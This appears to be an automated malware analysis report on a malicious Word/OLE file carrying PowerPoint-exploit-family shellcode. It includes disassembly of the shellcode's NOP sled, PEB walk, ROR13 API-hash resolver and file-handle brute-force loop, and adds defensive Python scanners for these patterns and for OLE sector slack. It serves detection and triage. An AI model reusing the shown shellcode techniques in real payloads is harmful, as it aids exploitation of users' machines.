Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 733a5dea192f55eb…

MALICIOUS

Office (OLE)

Size: 373.5 KB · Created: 2006-01-25 08:30:00 · Authoring application: Microsoft Office Word · First seen: 2015-09-29
MD5: 83639f4d109042333c7eb9cc63b12320 · SHA-1: 7e62b4375ef2d25f50ca2da885e3f729d4c6ff46 · SHA-256: 733a5dea192f55eba6d14444185a556a084d162656c2bc365fbd9d7dbe4c9b04
Risk score: 400

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The sample is classified as malicious on the strength of multiple high- and critical-severity heuristic firings: a raw shellcode payload and a native-code payload of the kind delivered by the PowerPoint binary-format memory-corruption family (CVE-2011-1269 / MS11-036). A NOP sled, PEB access through FS:[0x30], and an API-hash resolver together indicate position-independent shellcode rather than stray data. The OLE structure is also anomalous: 84% of the file sits in unallocated sector slack and an executable-looking payload is appended beyond the declared streams, so the document is a carrier for native code. One caveat: the file's own metadata names Microsoft Office Word as the authoring application while the payload heuristic is named for PowerPoint, so the CVE reference is a family-level match on the payload, not a confirmed identification of the parser bug; confirm it against the actual record structure before reporting it as the exploited vulnerability.

Heuristics (9)

  • PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family [critical, CVE likely] PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD
    A macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
  • Office EPRINT stream contains EMF object [high, CVE related] OLE_EPRINT_EMF_OBJECT
    The OLE ObjectPool contains an EPRINT stream carrying EMF data. This is rare in benign documents and, paired with the exploit-payload anomalies, is supporting evidence of Office object delivery; the malformed graphics record needed for exact CVE attribution is not proven by this rule alone.
  • XOR-encoded strings (key 0xFF) [critical] SC_XOR_ENCODED
    Found 8 Windows library/API name(s) XOR-encoded with the single-byte key 0xFF: 'KERNEL32.DLL' (5 occurrences), 'ADVAPI32.DLL' (3 occurrences)
    Disassembly hidden: these bytes score as data, not coherent x86 code (1/3 branch targets land on an instruction boundary, 33% coherence).
  • NOP sled detected [high] SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes (the listing below shows 51, 0x00000BEF–0x00000C21)
    Disassembly
    x86 disassembly · validity: code (0.716) — 3/4 branch targets land on an instruction boundary (75% coherence)
    00000BEF  90                nop
    00000BF0  90                nop
    00000BF1  90                nop
    00000BF2  90                nop
    00000BF3  90                nop
    00000BF4  90                nop
    00000BF5  90                nop
    00000BF6  90                nop
    00000BF7  90                nop
    00000BF8  90                nop
    00000BF9  90                nop
    00000BFA  90                nop
    00000BFB  90                nop
    00000BFC  90                nop
    00000BFD  90                nop
    00000BFE  90                nop
    00000BFF  90                nop
    00000C00  90                nop
    00000C01  90                nop
    00000C02  90                nop
    00000C03  90                nop
    00000C04  90                nop
    00000C05  90                nop
    00000C06  90                nop
    00000C07  90                nop
    00000C08  90                nop
    00000C09  90                nop
    00000C0A  90                nop
    00000C0B  90                nop
    00000C0C  90                nop
    00000C0D  90                nop
    00000C0E  90                nop
    00000C0F  90                nop
    00000C10  90                nop
    00000C11  90                nop
    00000C12  90                nop
    00000C13  90                nop
    00000C14  90                nop
    00000C15  90                nop
    00000C16  90                nop
    00000C17  90                nop
    00000C18  90                nop
    00000C19  90                nop
    00000C1A  90                nop
    00000C1B  90                nop
    00000C1C  90                nop
    00000C1D  90                nop
    00000C1E  90                nop
    00000C1F  90                nop
    00000C20  90                nop
    00000C21  4e                dec esi
    00000C22  56                push esi
    00000C23  ff550c            call dword ptr [ebp + 0xc]
    00000C26  55                push ebp
    00000C27  8bec              mov ebp, esp
    00000C29  51                push ecx
    00000C2A  53                push ebx
    00000C2B  8b7d08            mov edi, dword ptr [ebp + 8]
    00000C2E  eb09              jmp 0xc39
    00000C30  ff                .byte 0xff
    00000C31  ff                .byte 0xff
    00000C32  ff                .byte 0xff
    00000C33  ff                .byte 0xff
    00000C34  ff                .byte 0xff
    00000C35  ff                .byte 0xff
    00000C36  ff9090908b5d      call dword ptr [eax + 0x5d8b9090]
    00000C3C  0c56              or al, 0x56
    00000C3E  8b733c            mov esi, dword ptr [ebx + 0x3c]
    00000C41  8b741e78          mov esi, dword ptr [esi + ebx + 0x78]
    00000C45  03f3              add esi, ebx
    00000C47  56                push esi
    00000C48  8b7620            mov esi, dword ptr [esi + 0x20]
    00000C4B  03f3              add esi, ebx
    00000C4D  33c9              xor ecx, ecx
    Note: the sweep is linear, so 0x00000C30–0x00000C38 (seven 0xff bytes and two 0x90) decode as a bogus call. The jmp at 0x00000C2E lands on 0x00000C39 (a nop), after which 8b 5d 0c at 0x00000C3A decodes as mov ebx, dword ptr [ebp + 0xc] and 56 at 0x00000C3D as push esi. The routine entered at 0x00000C26 (push ebp; mov ebp, esp) takes a module base in [ebp + 8] and a second argument in [ebp + 0xc]; the loads [ebx + 0x3c] (e_lfanew), [esi + ebx + 0x78] (export directory RVA) and [esi + 0x20] (AddressOfNames) are the standard export-table walk of a hash-based import resolver, and 0x00000C26 is the target of the call at 0x00000B7E in the PEB-access listing.
  • PEB access via FS segment (x86) [high] SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: uncertain (0.675) — 3/6 branch targets land on an instruction boundary (50% coherence)
    00000B59  64a130000000      mov eax, dword ptr fs:[0x30]
    00000B5F  8b400c            mov eax, dword ptr [eax + 0xc]
    00000B62  8b701c            mov esi, dword ptr [eax + 0x1c]
    00000B65  ad                lodsd eax, dword ptr [esi]
    00000B66  8b7008            mov esi, dword ptr [eax + 8]
    00000B69  81ec00070000      sub esp, 0x700
    00000B6F  8bec              mov ebp, esp
    00000B71  e912010000        jmp 0xc88
    00000B76  5b                pop ebx
    00000B77  33c9              xor ecx, ecx
    00000B79  b10c              mov cl, 0xc
    00000B7B  56                push esi
    00000B7C  ff33              push dword ptr [ebx]
    00000B7E  e8a3000000        call 0xc26
    00000B83  89448d00          mov dword ptr [ebp + ecx*4], eax
    00000B87  83c304            add ebx, 4
    00000B8A  e2ef              loop 0xb7b
    00000B8C  33f6              xor esi, esi
    00000B8E  bfe8170100        mov edi, 0x117e8
    00000B93  c74554f1bd0400    mov dword ptr [ebp + 0x54], 0x4bdf1
    00000B9A  037d54            add edi, dword ptr [ebp + 0x54]
    00000B9D  897558            mov dword ptr [ebp + 0x58], esi
    00000BA0  83455804          add dword ptr [ebp + 0x58], 4
    00000BA4  56                push esi
    00000BA5  ff7558            push dword ptr [ebp + 0x58]
    00000BA8  ff552c            call dword ptr [ebp + 0x2c]
    00000BAB  3bc7              cmp eax, edi
    00000BAD  740b              je 0xbba
    00000BAF  817d5800000100    cmp dword ptr [ebp + 0x58], 0x10000
    00000BB6  7432              je 0xbea
    00000BB8  eb                .byte 0xeb
    Note: fs:[0x30] is the PEB, [eax + 0xc] is PEB->Ldr and [eax + 0x1c] the InInitializationOrderModuleList head, so after lodsd the load from [eax + 8] is the DllBase of the first entry in that list. The jmp to 0x00000C88 followed by pop ebx at 0x00000B76 is consistent with the jmp/call/pop idiom that leaves the address of a data table in ebx: ecx is set to 12 (mov cl, 0xc), and each dword at [ebx] is pushed with the module base to the resolver at 0x00000C26, with the result stored at [ebp + ecx*4], so [ebp + 0x2c] and [ebp + 0xc] called later are resolved imports. The loop at 0x00000B9D–0x00000BB8 steps a value through 4, 8, ... 0x10000, calls [ebp + 0x2c] with (value, 0) and compares the result with edi = 0x117e8 + 0x4bdf1 = 0x5d5d9 = 382,425, which is exactly the file size on disk. That is the usual Office-exploit pattern of brute-forcing handle values to find the handle the application holds on the document itself (consistent with [ebp + 0x2c] being GetFileSize; this is an inference from the listing, not a resolved symbol). Any change to the file length, such as truncation or padding, will defeat the payload's self-location.
  • PEB API-hash resolver [high] SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly: identical to the SC_PEB_ACCESS listing above (0x00000B59–0x00000BB8; validity uncertain, 0.675, 3/6 branch targets on an instruction boundary), not repeated here.
  • OLE document has large unaccounted-for region [high] OLE_SLACK_ANOMALY
    OLE file is 382,425 bytes but its declared streams total only 60,983 bytes — 321,442 bytes (84%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • OLE file has appended executable-looking payload bytes [high] OLE_APPENDED_PAYLOAD
    OLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
  • OLE file contains raw shellcode-like resolver payload [high] OLE_RAW_SHELLCODE_PAYLOAD
    Malformed or legacy OLE file contains raw PEB/API-resolver shellcode bytes at the file level, including loader-walk instructions and a nearby payload marker. This indicates an exploit payload carrier but does not identify a specific parser CVE.
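The three byte-level heuristics above (SC_XOR_ENCODED, SC_NOP_SLED and SC_PEB_ACCESS) are all pattern scans over the raw file, and a reader reproducing this triage will want them as one script. The following is an added example, not the analysis engine's own code: it brute-forces every single-byte XOR key for a list of DLL/API names, finds runs of 0x90, and matches the x86 encodings of mov r32, fs:[0x30]. API_NAMES and PEB_STUBS are assumed lists (the report only shows KERNEL32.DLL and ADVAPI32.DLL under key 0xFF), and build_sample() is a constructed buffer for offline testing, not bytes from the sample.

```python
import re

# Names the report found XOR-encoded in this sample plus a few common loader imports.
# Assumed list: extend it with the full kernel32/advapi32 export names for other samples.
API_NAMES = [b"KERNEL32.DLL", b"ADVAPI32.DLL", b"LoadLibraryA", b"GetProcAddress", b"WinExec"]

# x86 encodings that read the PEB pointer out of the TEB: the short A1 form seen in the
# listing (64 a1 30 00 00 00), the ModRM forms for each register, and the fs:[eax+0x30] variant.
PEB_STUBS = {
    b"\x64\xa1\x30\x00\x00\x00": "mov eax, fs:[0x30]",
    b"\x64\x8b\x05\x30\x00\x00\x00": "mov eax, fs:[0x30]",
    b"\x64\x8b\x0d\x30\x00\x00\x00": "mov ecx, fs:[0x30]",
    b"\x64\x8b\x15\x30\x00\x00\x00": "mov edx, fs:[0x30]",
    b"\x64\x8b\x1d\x30\x00\x00\x00": "mov ebx, fs:[0x30]",
    b"\x64\x8b\x35\x30\x00\x00\x00": "mov esi, fs:[0x30]",
    b"\x64\x8b\x3d\x30\x00\x00\x00": "mov edi, fs:[0x30]",
    b"\x64\x8b\x40\x30": "mov eax, fs:[eax+0x30]",
}


def find_all(buf: bytes, pat: bytes):
    """Every offset at which pat occurs in buf (overlapping matches included)."""
    out, i = [], buf.find(pat)
    while i != -1:
        out.append(i)
        i = buf.find(pat, i + 1)
    return out


def xor_encoded_names(buf: bytes, names=API_NAMES):
    """Try all 255 non-zero single-byte keys; return (offset, key, name) for each encoded name.
    Key 0 is skipped on purpose: plaintext names are a different (weaker) signal."""
    hits = []
    for key in range(1, 256):
        for name in names:
            enc = bytes(b ^ key for b in name)
            hits.extend((off, key, name.decode()) for off in find_all(buf, enc))
    return sorted(hits)


def nop_sleds(buf: bytes, min_len=20):
    """(offset, length) of every run of at least min_len consecutive 0x90 bytes."""
    return [(m.start(), m.end() - m.start()) for m in re.finditer(b"\x90{%d,}" % min_len, buf)]


def peb_access(buf: bytes):
    """(offset, mnemonic) of every FS:[0x30] PEB read."""
    return sorted((off, text) for pat, text in PEB_STUBS.items() for off in find_all(buf, pat))


def scan(buf: bytes) -> dict:
    return {"xor_names": xor_encoded_names(buf), "nop_sleds": nop_sleds(buf), "peb_access": peb_access(buf)}


def build_sample() -> bytes:
    """Constructed test buffer (not bytes from the sample): 512 bytes of filler, a 49-byte NOP sled
    followed by the bytes that follow the sled in the report's listing, the PEB stub from the
    listing, and two DLL names XOR-encoded with key 0xFF."""
    xor_ff = lambda s: bytes(b ^ 0xFF for b in s)
    return (bytes(range(256)) * 2
            + b"\x90" * 49 + b"\x4e\x56\xff\x55\x0c"
            + b"\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x70\x08"
            + xor_ff(b"KERNEL32.DLL\x00") + xor_ff(b"ADVAPI32.DLL\x00")
            + b"\x00" * 32)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for kind, items in scan(data).items():
        for item in items:
            print(kind, *("0x%x" % v if isinstance(v, int) else v for v in item))
```

Run it with a file path to scan a real document; with no argument it scans the constructed buffer. Offsets are file offsets, matching the convention of the disassembly listings above.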
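The SC_API_HASH_RESOLVER heuristic names ROR13-style hashing, and the PEB-access listing shows a 12-entry hash table being resolved (mov cl, 0xc), but the report does not recover the hash values themselves. The following added example, not part of the report, implements the classic ROR13 export hash (h = ror(h, 13) + byte over the ASCII name, no terminator) and resolves a little-endian dword table against a candidate name list. CANDIDATES is an assumed list; for a real table, feed it the complete export names of kernel32.dll and advapi32.dll, and swap in a different hasher if the family uses ROR7, ROL, or hashes the module name as well.

```python
import struct


def ror13_hash(name: bytes) -> int:
    """Classic position-independent-shellcode export hash: rotate right by 13, add the next byte."""
    h = 0
    for b in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + b) & 0xFFFFFFFF
    return h


# Assumed candidate list (not recovered from the sample): common loader/dropper imports.
CANDIDATES = [b"LoadLibraryA", b"GetProcAddress", b"VirtualAlloc", b"VirtualProtect", b"WinExec",
              b"CreateFileA", b"ReadFile", b"WriteFile", b"SetFilePointer", b"GetFileSize",
              b"CloseHandle", b"ExitProcess", b"GetTempPathA", b"RegOpenKeyExA", b"RegSetValueExA"]


def build_table(candidates=CANDIDATES, hasher=ror13_hash) -> dict:
    """hash -> name for every candidate; hasher is swappable for other hash variants."""
    return {hasher(n): n.decode() for n in candidates}


def hashes_from_bytes(blob: bytes, count: int, offset: int = 0):
    """Read `count` little-endian dword hashes from blob at offset (the sample loads 12)."""
    return list(struct.unpack_from("<%dI" % count, blob, offset))


def resolve_hashes(hashes, table=None):
    """Map each hash to a name; hashes not in the table are kept as 'unknown:<hex>'."""
    table = build_table() if table is None else table
    return [table.get(h, "unknown:%08x" % h) for h in hashes]


if __name__ == "__main__":
    # Constructed table: two known names and one value that no candidate hashes to.
    blob = struct.pack("<3I", ror13_hash(b"LoadLibraryA"), ror13_hash(b"GetFileSize"), 0xDEADBEEF)
    for h, name in zip(hashes_from_bytes(blob, 3), resolve_hashes(hashes_from_bytes(blob, 3))):
        print("%08x  %s" % (h, name))
```

The known value ror13("LoadLibraryA") = 0xEC0E4E8E is a quick sanity check that the rotate direction and width are right before trusting the table output.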
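The OLE_SLACK_ANOMALY figure above (321,442 of 382,425 bytes, 84%) is the difference between the file size and the declared stream sizes. A complementary check a reviewer would want is sector-level: how many bytes lie outside any chain the FAT allocates, which is where an appended payload (OLE_APPENDED_PAYLOAD) has to live. The following is an added example, not the analysis engine's code: it parses the compound-file header and FAT and counts sectors marked FREESECT, sectors beyond the FAT's coverage, and any partial trailing sector. It only handles the 109 FAT sectors addressable from the header DIFAT (about 6.8 MB at 512-byte sectors, comfortably more than this sample). build_sample_ole() is a constructed minimal compound file for offline testing, not data from the sample.

```python
import struct

OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
FREESECT, ENDOFCHAIN, FATSECT = 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFD


def ole_slack(data: bytes) -> dict:
    """Bytes of an OLE compound file that no FAT chain allocates (free sectors, sectors past the
    FAT's coverage, and a partial sector at EOF). Raises on non-OLE input."""
    if len(data) < 512 or data[:8] != OLE_MAGIC:
        raise ValueError("not an OLE compound file")
    sector_size = 1 << struct.unpack_from("<H", data, 0x1E)[0]
    num_fat = struct.unpack_from("<I", data, 0x2C)[0]
    num_difat = struct.unpack_from("<I", data, 0x48)[0]
    if num_difat or num_fat > 109:
        raise NotImplementedError("DIFAT sector chain (more than 109 FAT sectors) not handled")
    fat = []
    for sec in struct.unpack_from("<%dI" % num_fat, data, 0x4C):   # header DIFAT lists FAT sectors
        off = (sec + 1) * sector_size                               # sector N starts after the header
        if off + sector_size > len(data):
            raise ValueError("FAT sector %d lies outside the file" % sec)
        fat.extend(struct.unpack_from("<%dI" % (sector_size // 4), data, off))
    total_sectors, trailing = divmod(len(data) - sector_size, sector_size)
    described = min(total_sectors, len(fat))                       # sectors the FAT says anything about
    free_marked = sum(1 for i in range(described) if fat[i] == FREESECT)
    beyond_fat = total_sectors - described
    unallocated = (free_marked + beyond_fat) * sector_size + trailing
    return {"file_size": len(data), "sector_size": sector_size, "sectors": total_sectors,
            "free_marked": free_marked, "beyond_fat": beyond_fat, "trailing": trailing,
            "unallocated_bytes": unallocated,
            "unallocated_pct": round(100.0 * unallocated / len(data), 1)}


def build_sample_ole(slack_sectors: int) -> bytes:
    """Constructed minimal v3 compound file: header, one FAT sector (sector 0), one directory
    sector (1), one data sector (2), then slack_sectors of appended junk the FAT marks free."""
    ss = 512
    hdr = bytearray(ss)
    hdr[:8] = OLE_MAGIC
    struct.pack_into("<HHHHH", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6)    # minor, major, byte order, shifts
    # num dir sectors, num FAT, first dir, txn, mini cutoff, first minifat, num minifat, first DIFAT, num DIFAT
    struct.pack_into("<9I", hdr, 0x28, 0, 1, 1, 0, 0x1000, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<109I", hdr, 0x4C, 0, *([FREESECT] * 108))   # DIFAT: FAT lives in sector 0
    fat = [FREESECT] * (ss // 4)
    fat[0], fat[1], fat[2] = FATSECT, ENDOFCHAIN, ENDOFCHAIN
    fat_sector = struct.pack("<%dI" % (ss // 4), *fat)
    dir_sector = bytes(ss)            # directory entries are not needed for the sector-level check
    data_sector = b"A" * ss
    return bytes(hdr) + fat_sector + dir_sector + data_sector + b"\xCC" * (ss * slack_sectors)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_ole(4)
    for k, v in ole_slack(data).items():
        print("%-18s %s" % (k, v))
```

A large unallocated figure is a carrier signal, as the heuristic text says, not a CVE attribution; pair it with the offsets from the shellcode scan to see whether the payload actually sits in the free or out-of-FAT sectors.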